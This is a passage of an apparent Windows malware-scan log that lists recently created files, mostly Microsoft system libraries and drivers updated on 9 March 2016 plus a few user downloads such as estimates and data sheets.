2016-03-10 16:13 - 2016-03-10 16:13 - 00013793 _____ C:\Users\lks\Downloads\JF estimate for this year (7)
2016-03-10 15:58 - 2016-03-10 15:58 - 00013793 _____ C:\Users\lks\Downloads\JF estimate for this year (6)
2016-03-10 15:57 - 2016-03-10 15:57 - 00013793 _____ C:\Users\lks\Downloads\JF estimate for this year (5)
2016-03-10 15:55 - 2016-03-10 15:55 - 00013793 _____ C:\Users\lks\Downloads\JF estimate for this year (4)
2016-03-10 15:55 - 2016-03-10 15:55 - 00013793 _____ C:\Users\lks\Downloads\JF estimate for this year (3)
2016-03-10 15:43 - 2016-03-10 15:43 - 00013793 _____ C:\Users\lks\Downloads\JF estimate for this year (2)
2016-03-10 15:43 - 2016-03-10 15:43 - 00013793 _____ C:\Users\lks\Downloads\JF estimate for this year (1)
2016-03-10 15:42 - 2016-03-10 15:42 - 00013793 _____ C:\Users\lks\Downloads\JF estimate for this year
2016-03-10 10:45 - 2016-03-10 10:45 - 00022561 _____ C:\Users\lks\Downloads\Fee Schedule 2015.pdf
2016-03-10 09:28 - 2016-03-10 09:28 - 00479470 _____ C:\Users\lks\Downloads\Wednesday Data Sheet 03-09-16     .xlsx
2016-03-10 09:28 - 2016-03-10 09:28 - 00474673 _____ C:\Users\lks\Downloads\Tuesday  Data Sheet 03-08-16    (1).xlsx
2016-03-10 09:28 - 2016-03-10 09:28 - 00015065 _____ C:\Users\lks\Downloads\3-9-16 Wednesday Data Sheet.xlsx
2016-03-09 13:46 - 2016-03-09 13:46 - 00198408 _____ C:\Users\lks\Downloads\The Three Little Pigs (1).bm2
2016-03-09 13:44 - 2016-03-09 13:45 - 00198408 _____ C:\Users\lks\Downloads\The Three Little Pigs.bm2
2016-03-09 12:34 - 2016-03-09 12:34 - 00144764 _____ C:\Users\lks\Desktop\Estimate Newport Middletown 2015-2016 (2).pdf
2016-03-09 10:29 - 2016-02-09 02:53 - 00387792 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2016-03-09 10:29 - 2016-02-09 02:10 - 00341200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2016-03-09 10:29 - 2016-02-08 17:05 - 20352512 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2016-03-09 10:29 - 2016-02-08 16:51 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2016-03-09 10:29 - 2016-02-08 16:39 - 00496640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2016-03-09 10:29 - 2016-02-08 16:39 - 00062464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll
2016-03-09 10:29 - 2016-02-08 16:38 - 00341504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\html.iec
2016-03-09 10:29 - 2016-02-08 16:38 - 00047616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll
2016-03-09 10:29 - 2016-02-08 16:37 - 00064000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll
2016-03-09 10:29 - 2016-02-08 16:34 - 02280448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2016-03-09 10:29 - 2016-02-08 16:32 - 00047104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2016-03-09 10:29 - 2016-02-08 16:31 - 00030720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll
2016-03-09 10:29 - 2016-02-08 16:30 - 00476160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2016-03-09 10:29 - 2016-02-08 16:28 - 00663552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
2016-03-09 10:29 - 2016-02-08 16:28 - 00620032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll
2016-03-09 10:29 - 2016-02-08 16:28 - 00115712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe
2016-03-09 10:29 - 2016-02-08 16:20 - 00416256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2016-03-09 10:29 - 2016-02-08 16:16 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll
2016-03-09 10:29 - 2016-02-08 16:15 - 00091136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inseng.dll
2016-03-09 10:29 - 2016-02-08 16:13 - 00168960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll
2016-03-09 10:29 - 2016-02-08 16:12 - 00076288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2016-03-09 10:29 - 2016-02-08 16:11 - 00279040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2016-03-09 10:29 - 2016-02-08 16:10 - 04611072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2016-03-09 10:29 - 2016-02-08 16:10 - 00130048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\occache.dll
2016-03-09 10:29 - 2016-02-08 16:05 - 25816576 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2016-03-09 10:29 - 2016-02-08 16:03 - 00230400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\webcheck.dll
2016-03-09 10:29 - 2016-02-08 16:02 - 13012480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2016-03-09 10:29 - 2016-02-08 16:02 - 00687104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2016-03-09 10:29 - 2016-02-08 16:01 - 02050560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2016-03-09 10:29 - 2016-02-08 16:01 - 01155072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmlmedia.dll
2016-03-09 10:29 - 2016-02-08 15:43 - 02121216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2016-03-09 10:29 - 2016-02-08 15:39 - 01311744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2016-03-09 10:29 - 2016-02-08 15:38 - 00710144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2016-03-09 10:29 - 2016-02-08 14:41 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2016-03-09 10:29 - 2016-02-08 14:41 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2016-03-09 10:29 - 2016-02-08 14:27 - 02887680 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2016-03-09 10:29 - 2016-02-08 14:27 - 00066560 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2016-03-09 10:29 - 2016-02-08 14:26 - 00571904 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2016-03-09 10:29 - 2016-02-08 14:26 - 00417792 _____ (Microsoft Corporation) C:\Windows\system32\html.iec
2016-03-09 10:29 - 2016-02-08 14:26 - 00088064 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2016-03-09 10:29 - 2016-02-08 14:26 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2016-03-09 10:29 - 2016-02-08 14:19 - 00054784 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2016-03-09 10:29 - 2016-02-08 14:18 - 00034304 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2016-03-09 10:29 - 2016-02-08 14:16 - 06052352 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2016-03-09 10:29 - 2016-02-08 14:15 - 00615936 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2016-03-09 10:29 - 2016-02-08 14:14 - 00144384 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2016-03-09 10:29 - 2016-02-08 14:14 - 00114688 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2016-03-09 10:29 - 2016-02-08 14:13 - 00817664 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2016-03-09 10:29 - 2016-02-08 14:13 - 00814080 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2016-03-09 10:29 - 2016-02-08 14:06 - 00968704 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2016-03-09 10:29 - 2016-02-08 14:03 - 00489984 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2016-03-09 10:29 - 2016-02-08 13:55 - 00077824 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2016-03-09 10:29 - 2016-02-08 13:54 - 00107520 _____ (Microsoft Corporation) C:\Windows\system32\inseng.dll
2016-03-09 10:29 - 2016-02-08 13:52 - 00199680 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2016-03-09 10:29 - 2016-02-08 13:51 - 00092160 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2016-03-09 10:29 - 2016-02-08 13:49 - 00315392 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2016-03-09 10:29 - 2016-02-08 13:47 - 00152064 _____ (Microsoft Corporation) C:\Windows\system32\occache.dll
2016-03-09 10:29 - 2016-02-08 13:37 - 00262144 _____ (Microsoft Corporation) C:\Windows\system32\webcheck.dll
2016-03-09 10:29 - 2016-02-08 13:35 - 00718336 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2016-03-09 10:29 - 2016-02-08 13:34 - 00798720 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2016-03-09 10:29 - 2016-02-08 13:33 - 14613504 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2016-03-09 10:29 - 2016-02-08 13:33 - 02123264 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2016-03-09 10:29 - 2016-02-08 13:33 - 01359360 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2016-03-09 10:29 - 2016-02-08 13:19 - 02597376 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2016-03-09 10:29 - 2016-02-08 13:07 - 01546752 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2016-03-09 10:29 - 2016-02-08 12:55 - 00800768 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2016-03-09 10:26 - 2016-02-12 14:52 - 03169792 _____ (Microsoft Corporation) C:\Windows\system32\wucltux.dll
2016-03-09 10:26 - 2016-02-12 14:52 - 00192512 _____ (Microsoft Corporation) C:\Windows\system32\wuwebv.dll
2016-03-09 10:26 - 2016-02-12 14:52 - 00098816 _____ (Microsoft Corporation) C:\Windows\system32\wudriver.dll
2016-03-09 10:26 - 2016-02-12 14:44 - 00091136 _____ (Microsoft Corporation) C:\Windows\system32\WinSetupUI.dll
2016-03-09 10:26 - 2016-02-12 14:39 - 00174080 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuwebv.dll
2016-03-09 10:26 - 2016-02-12 14:22 - 02610688 _____ (Microsoft Corporation) C:\Windows\system32\wuaueng.dll
2016-03-09 10:26 - 2016-02-12 14:19 - 00709120 _____ (Microsoft Corporation) C:\Windows\system32\wuapi.dll
2016-03-09 10:26 - 2016-02-12 14:18 - 00140288 _____ (Microsoft Corporation) C:\Windows\system32\wuauclt.exe
2016-03-09 10:26 - 2016-02-12 14:18 - 00037888 _____ (Microsoft Corporation) C:\Windows\system32\wups2.dll
2016-03-09 10:26 - 2016-02-12 14:18 - 00037888 _____ (Microsoft Corporation) C:\Windows\system32\wuapp.exe
2016-03-09 10:26 - 2016-02-12 14:18 - 00036864 _____ (Microsoft Corporation) C:\Windows\system32\wups.dll
2016-03-09 10:26 - 2016-02-12 14:18 - 00012288 _____ (Microsoft Corporation) C:\Windows\system32\wu.upgrade.ps.dll
2016-03-09 10:26 - 2016-02-12 14:06 - 00573440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuapi.dll
2016-03-09 10:26 - 2016-02-12 14:05 - 00093696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wudriver.dll
2016-03-09 10:26 - 2016-02-12 14:05 - 00035328 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuapp.exe
2016-03-09 10:26 - 2016-02-12 14:05 - 00030208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wups.dll
2016-03-09 10:26 - 2016-02-04 13:52 - 03211264 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2016-03-09 10:26 - 2016-02-03 14:07 - 00091648 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\USBSTOR.SYS
2016-03-09 10:26 - 2016-01-11 15:11 - 01684416 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ntfs.sys
2016-03-09 10:26 - 2015-11-19 10:07 - 00994760 _____ (Microsoft Corporation) C:\Windows\system32\ucrtbase.dll
2016-03-09 10:26 - 2015-11-19 10:07 - 00063840 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-private-l1-1-0.dll
2016-03-09 10:26 - 2015-11-19 10:07 - 00020832 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-math-l1-1-0.dll
2016-03-09 10:26 - 2015-11-19 10:07 - 00019808 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-multibyte-l1-1-0.dll
2016-03-09 10:26 - 2015-11-19 10:07 - 00017760 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-string-l1-1-0.dll
2016-03-09 10:26 - 2015-11-19 10:07 - 00017760 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-stdio-l1-1-0.dll
2016-03-09 10:26 - 2015-11-19 10:07 - 00016224 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-runtime-l1-1-0.dll
2016-03-09 10:26 - 2015-11-19 10:07 - 00015712 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-convert-l1-1-0.dll
2016-03-09 10:26 - 2015-11-19 10:07 - 00014176 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-time-l1-1-0.dll
2016-03-09 10:26 - 2015-11-19 10:07 - 00014176 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localization-l1-2-0.dll
2016-03-09 10:26 - 2015-11-19 10:07 - 00013664 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-filesystem-l1-1-0.dll
2016-03-09 10:26 - 2015-11-19 10:07 - 00012640 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-process-l1-1-0.dll
2016-03-09 10:26 - 2015-11-19 10:07 - 00012640 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-heap-l1-1-0.dll
2016-03-09 10:26 - 2015-11-19 10:07 - 00012640 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-conio-l1-1-0.dll
2016-03-09 10:26 - 2015-11-19 10:07 - 00012128 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-utility-l1-1-0.dll
2016-03-09 10:26 - 2015-11-19 10:07 - 00012128 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-locale-l1-1-0.dll
2016-03-09 10:26 - 2015-11-19 10:07 - 00012128 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-environment-l1-1-0.dll
2016-03-09 10:26 - 2015-11-19 10:07 - 00012128 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-synch-l1-2-0.dll
2016-03-09 10:26 - 2015-11-19 10:07 - 00012128 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processthreads-l1-1-1.dll
2016-03-09 10:26 - 2015-11-19 10:07 - 00011616 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-xstate-l2-1-0.dll
2016-03-09 10:26 - 2015-11-19 10:07 - 00011616 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-timezone-l1-1-0.dll
2016-03-09 10:26 - 2015-11-19 10:07 - 00011616 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-file-l2-1-0.dll
2016-03-09 10:26 - 2015-11-19 10:07 - 00011616 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-file-l1-2-0.dll
2016-03-09 10:26 - 2015-11-19 10:06 - 00922432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ucrtbase.dll
2016-03-09 10:26 - 2015-11-19 10:06 - 00066400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-private-l1-1-0.dll
2016-03-09 10:26 - 2015-11-19 10:06 - 00022368 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-math-l1-1-0.dll
2016-03-09 10:26 - 2015-11-19 10:06 - 00019808 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-multibyte-l1-1-0.dll
2016-03-09 10:26 - 2015-11-19 10:06 - 00017760 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-string-l1-1-0.dll
2016-03-09 10:26 - 2015-11-19 10:06 - 00017760 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-stdio-l1-1-0.dll
2016-03-09 10:26 - 2015-11-19 10:06 - 00016224 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-runtime-l1-1-0.dll
2016-03-09 10:26 - 2015-11-19 10:06 - 00015712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-convert-l1-1-0.dll
2016-03-09 10:26 - 2015-11-19 10:06 - 00014176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-time-l1-1-0.dll
2016-03-09 10:26 - 2015-11-19 10:06 - 00014176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localization-l1-2-0.dll
2016-03-09 10:26 - 2015-11-19 10:06 - 00013664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-filesystem-l1-1-0.dll
2016-03-09 10:26 - 2015-11-19 10:06 - 00012640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-process-l1-1-0.dll
2016-03-09 10:26 - 2015-11-19 10:06 - 00012640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-heap-l1-1-0.dll
2016-03-09 10:26 - 2015-11-19 10:06 - 00012640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-conio-l1-1-0.dll
2016-03-09 10:26 - 2015-11-19 10:06 - 00012128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-utility-l1-1-0.dll
2016-03-09 10:26 - 2015-11-19 10:06 - 00012128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-locale-l1-1-0.dll
2016-03-09 10:26 - 2015-11-19 10:06 - 00012128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-environment-l1-1-0.dll
2016-03-09 10:26 - 2015-11-19 10:06 - 00012128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-synch-l1-2-0.dll
2016-03-09 10:26 - 2015-11-19 10:06 - 00012128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processthreads-l1-1-1.dll
2016-03-09 10:26 - 2015-11-19 10:06 - 00011616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-xstate-l2-1-0.dll
2016-03-09 10:26 - 2015-11-19 10:06 - 00011616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-timezone-l1-1-0.dll
2016-03-09 10:26 - 2015-11-19 10:06 - 00011616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-file-l2-1-0.dll
2016-03-09 10:26 - 2015-11-19 10:06 - 00011616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-file-l1-2-0.dll
2016-03-09 10:25 - 2016-02-03 14:58 - 00862208 _____ (Microsoft Corporation) C:\Windows\system32\oleaut32.dll
2016-03-09 10:25 - 2016-02-03 14:52 - 00084992 _____ (Microsoft Corporation) C:\Windows\system32\asycfilt.dll
2016-03-09 10:25 - 2016-02-03 14:49 - 00572416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\oleaut32.dll
2016-03-09 10:25 - 2016-02-03 14:43 - 00067584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\asycfilt.dll
2016-03-09 10:23 - 2016-02-11 14:56 - 05572032 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2016-03-09 10:23 - 2016-02-11 14:56 - 00154560 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecpkg.sys
2016-03-09 10:23 - 2016-02-11 14:56 - 00095680 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecdd.sys
2016-03-09 10:23 - 2016-02-11 14:52 - 01733592 _____ (Microsoft Corporation) C:\Windows\system32\ntdll.dll
2016-03-09 10:23 - 2016-02-11 14:48 - 01214464 _____ (Microsoft Corporation) C:\Windows\system32\rpcrt4.dll
2016-03-09 10:23 - 2016-02-11 14:48 - 00344064 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll
2016-03-09 10:23 - 2016-02-11 14:44 - 03994560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntkrnlpa.exe
2016-03-09 10:23 - 2016-02-11 14:44 - 03938240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntoskrnl.exe
2016-03-09 10:23 - 2016-02-11 14:44 - 01461248 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2016-03-09 10:23 - 2016-02-11 14:44 - 01163264 _____ (Microsoft Corporation) C:\Windows\system32\kernel32.dll
2016-03-09 10:23 - 2016-02-11 14:44 - 00730112 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll
2016-03-09 10:23 - 2016-02-11 14:44 - 00422400 _____ (Microsoft Corporation) C:\Windows\system32\KernelBase.dll
2016-03-09 10:23 - 2016-02-11 14:41 - 01314328 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntdll.dll
2016-03-09 10:23 - 2016-02-11 14:41 - 00880128 _____ (Microsoft Corporation) C:\Windows\system32\advapi32.dll
2016-03-09 10:23 - 2016-02-11 14:38 - 00665088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpcrt4.dll
2016-03-09 10:23 - 2016-02-11 14:38 - 00275456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KernelBase.dll
2016-03-09 10:23 - 2016-02-11 14:33 - 00553472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kerberos.dll
2016-03-09 10:23 - 2016-02-11 14:30 - 00642560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\advapi32.dll
2016-03-09 10:23 - 2016-02-11 13:34 - 00159232 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb.sys
2016-03-09 10:23 - 2016-02-11 13:32 - 00112640 _____ (Microsoft Corporation) C:\Windows\system32\smss.exe
2016-03-09 10:22 - 2016-02-11 14:49 - 00362496 _____ (Microsoft Corporation) C:\Windows\system32\wow64win.dll
2016-03-09 10:22 - 2016-02-11 14:49 - 00243712 _____ (Microsoft Corporation) C:\Windows\system32\wow64.dll
2016-03-09 10:22 - 2016-02-11 14:49 - 00215040 _____ (Microsoft Corporation) C:\Windows\system32\winsrv.dll
2016-03-09 10:22 - 2016-02-11 14:49 - 00210432 _____ (Microsoft Corporation) C:\Windows\system32\wdigest.dll
2016-03-09 10:22 - 2016-02-11 14:49 - 00135680 _____ (Microsoft Corporation) C:\Windows\system32\sspicli.dll
2016-03-09 10:22 - 2016-02-11 14:49 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2016-03-09 10:22 - 2016-02-11 14:49 - 00028672 _____ (Microsoft Corporation) C:\Windows\system32\sspisrv.dll
2016-03-09 10:22 - 2016-02-11 14:49 - 00013312 _____ (Microsoft Corporation) C:\Windows\system32\wow64cpu.dll
2016-03-09 10:22 - 2016-02-11 14:48 - 00503808 _____ (Microsoft Corporation) C:\Windows\system32\srcore.dll
2016-03-09 10:22 - 2016-02-11 14:48 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\srclient.dll
2016-03-09 10:22 - 2016-02-11 14:48 - 00028160 _____ (Microsoft Corporation) C:\Windows\system32\secur32.dll
2016-03-09 10:22 - 2016-02-11 14:47 - 00016384 _____ (Microsoft Corporation) C:\Windows\system32\ntvdm64.dll
2016-03-09 10:22 - 2016-02-11 14:45 - 00315392 _____ (Microsoft Corporation) C:\Windows\system32\msv1_0.dll
2016-03-09 10:22 - 2016-02-11 14:45 - 00312320 _____ (Microsoft Corporation) C:\Windows\system32\ncrypt.dll
2016-03-09 10:22 - 2016-02-11 14:45 - 00146432 _____ (Microsoft Corporation) C:\Windows\system32\msaudite.dll
2016-03-09 10:22 - 2016-02-11 14:45 - 00060416 _____ (Microsoft Corporation) C:\Windows\system32\msobjs.dll
2016-03-09 10:22 - 2016-02-11 14:42 - 00043520 _____ (Microsoft Corporation) C:\Windows\system32\csrsrv.dll
2016-03-09 10:22 - 2016-02-11 14:42 - 00043520 _____ (Microsoft Corporation) C:\Windows\system32\cryptbase.dll
2016-03-09 10:22 - 2016-02-11 14:42 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2016-03-09 10:22 - 2016-02-11 14:41 - 00686080 _____ (Microsoft Corporation) C:\Windows\system32\adtschema.dll
2016-03-09 10:22 - 2016-02-11 14:41 - 00006656 _____ (Microsoft Corporation) C:\Windows\system32\apisetschema.dll
2016-03-09 10:22 - 2016-02-11 14:41 - 00006144 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-security-base-l1-1-0.dll
2016-03-09 10:22 - 2016-02-11 14:41 - 00005120 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-file-l1-1-0.dll
2016-03-09 10:22 - 2016-02-11 14:41 - 00004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-threadpool-l1-1-0.dll
2016-03-09 10:22 - 2016-02-11 14:41 - 00004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processthreads-l1-1-0.dll
2016-03-09 10:22 - 2016-02-11 14:41 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-sysinfo-l1-1-0.dll
2016-03-09 10:22 - 2016-02-11 14:41 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-synch-l1-1-0.dll
2016-03-09 10:22 - 2016-02-11 14:41 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localregistry-l1-1-0.dll
2016-03-09 10:22 - 2016-02-11 14:41 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localization-l1-1-0.dll
2016-03-09 10:22 - 2016-02-11 14:41 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-rtlsupport-l1-1-0.dll
2016-03-09 10:22 - 2016-02-11 14:41 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processenvironment-l1-1-0.dll
2016-03-09 10:22 - 2016-02-11 14:41 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-namedpipe-l1-1-0.dll
2016-03-09 10:22 - 2016-02-11 14:41 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-misc-l1-1-0.dll
2016-03-09 10:22 - 2016-02-11 14:41 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-memory-l1-1-0.dll
2016-03-09 10:22 - 2016-02-11 14:41 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-libraryloader-l1-1-0.dll
2016-03-09 10:22 - 2016-02-11 14:41 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-heap-l1-1-0.dll
2016-03-09 10:22 - 2016-02-11 14:41 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-xstate-l1-1-0.dll
2016-03-09 10:22 - 2016-02-11 14:41 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-util-l1-1-0.dll
2016-03-09 10:22 - 2016-02-11 14:41 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-string-l1-1-0.dll
2016-03-09 10:22 - 2016-02-11 14:41 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-profile-l1-1-0.dll
2016-03-09 10:22 - 2016-02-11 14:41 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-io-l1-1-0.dll
2016-03-09 10:22 - 2016-02-11 14:41 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-interlocked-l1-1-0.dll
2016-03-09 10:22 - 2016-02-11 14:41 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-handle-l1-1-0.dll
2016-03-09 10:22 - 2016-02-11 14:41 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-fibers-l1-1-0.dll
2016-03-09 10:22 - 2016-02-11 14:41 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-errorhandling-l1-1-0.dll
2016-03-09 10:22 - 2016-02-11 14:41 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-delayload-l1-1-0.dll
2016-03-09 10:22 - 2016-02-11 14:41 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-debug-l1-1-0.dll
2016-03-09 10:22 - 2016-02-11 14:41 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-datetime-l1-1-0.dll
